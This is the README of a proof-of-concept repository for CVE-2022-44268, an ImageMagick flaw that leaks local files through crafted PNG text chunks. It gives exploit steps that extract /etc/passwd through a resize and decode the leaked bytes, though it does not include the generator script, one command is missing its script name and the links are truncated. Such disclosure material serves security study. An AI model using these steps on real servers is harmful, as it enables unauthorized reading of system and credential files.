# CVE-2022-44268

This repository contains a Proof of Concept (POC) for a vulnerability in [ImageMagick]( (v. 7.1.0-49), a widely used open-source image manipulation library. The vulnerability allows an attacker to embed the content of an arbitrary file into a resized image when ImageMagick parses a PNG file.

## Description

When ImageMagick performs operations such as resizing on a PNG file, it may include the content of a system file, given that the magick binary has the necessary permissions to read it. This vulnerability arises due to the mishandling of textual chunks within PNG files.

A malicious actor can exploit this vulnerability by crafting a PNG file or using an existing one and adding a textual chunk type (tEXt). These chunks consist of a keyword and a text string. In this case, if the keyword matches the string "profile" (without quotes), ImageMagick will interpret the accompanying text string as a filename and attempt to load its content as a raw profile. As a result, when the resized image is downloaded, it will contain the content of the remote file specified by the attacker.

For more information, see [this article from MetabaseQ](

## Proof of Concept

To exploit Imagemagick, generate a malicious png: 

python3 /etc/passwd  # Create output.png

Then, run a resize operation with convert:

convert output.png -resize 50% leak.png

Finally, inspect the leak image and convert the `Raw profile` to hex:

identify -verbose leak.png
# ...
Raw profile type:

726f6f743a783a303a303a726f6f743a2f726f6f743a2f6269 [...]

python -c "print(bytes.fromhex('726f6f743a783a303a303a726f6f743a2f726f6f743a2f6269 [...]'))"

> Note: This POC is intended for educational and informational purposes only. Please ensure that you have the necessary permissions and legal authorization before testing or using this POC on any system.